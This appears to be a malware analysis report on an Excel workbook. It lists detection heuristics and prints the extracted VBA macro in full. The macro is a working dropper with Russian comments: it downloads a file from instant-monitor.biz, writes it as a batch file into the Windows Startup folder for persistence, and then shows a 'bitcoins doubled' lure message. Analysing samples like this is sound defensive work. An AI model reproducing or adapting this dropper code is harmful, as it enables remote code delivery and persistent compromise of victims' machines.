MALICIOUS
162
Risk Score
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
ADOStream.Write XMLHTTP.responseBody 'Записываем в виде массива байтов. Используется при закачке бинарного файла -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
FileName = CreateObject("Scripting.FileSystemObject").GetFileName(URL) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://instant-monitor.biz/1.txt Referenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2610 bytes |
SHA-256: 15b3983f4b48d84eeb17c57486f1ccd6a4057ebaf0f75cc31a5108b26b89e02f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Private Sub Workbook_BeforeClose(Cancel As Boolean)
'Shell "C:\ProgramData\1.bat", vbHide
'End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub ФайлПоСсылкеИзИнтернета()
Dim XMLHTTP As Object
Dim ADOStream As Object
Dim FolderSave$, URL$, FileName$
'Папка для сохранения файла
FolderSave = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
'Ссылка на файл в инете
URL = "https://instant-monitor.biz/1.txt"
'Получаем имя файла с расширение
FileName = CreateObject("Scripting.FileSystemObject").GetFileName(URL)
Set XMLHTTP = CreateObject("Microsoft.XMLHTTP") 'MSXML2.XMLHTTP
XMLHTTP.Open "GET", URL, "False"
XMLHTTP.send
If XMLHTTP.Status = 200 Then
Set ADOStream = CreateObject("ADODB.Stream")
ADOStream.Type = 1 'указываем тип данных, содержащихся в потоке. Бинарный.
ADOStream.Open 'Открывает поток для работы потоков двоичных или текстовых данных
ADOStream.Write XMLHTTP.responseBody 'Записываем в виде массива байтов. Используется при закачке бинарного файла
ADOStream.SaveToFile FolderSave & "1.bat", 2 'Сохраняем файл в указанную папку
'1 не перезаписывать файл
'2 перезаписать файл
ADOStream.Close 'Закрывает открытый объект и все зависимые объекты
Set ADOStream = Nothing
MsgBox "Биткойны удвоены!", vbInformation, "Ок"
Else
MsgBox "Не удаётся удвоить биткойны", vbExclamation, "Опаньки"
End If
Set XMLHTTP = Nothing
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 18432 bytes |
SHA-256: 9f1169c2dd1ca76954dfc973d2fb39dd70012bf039c357d916d433e12de55dd5 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.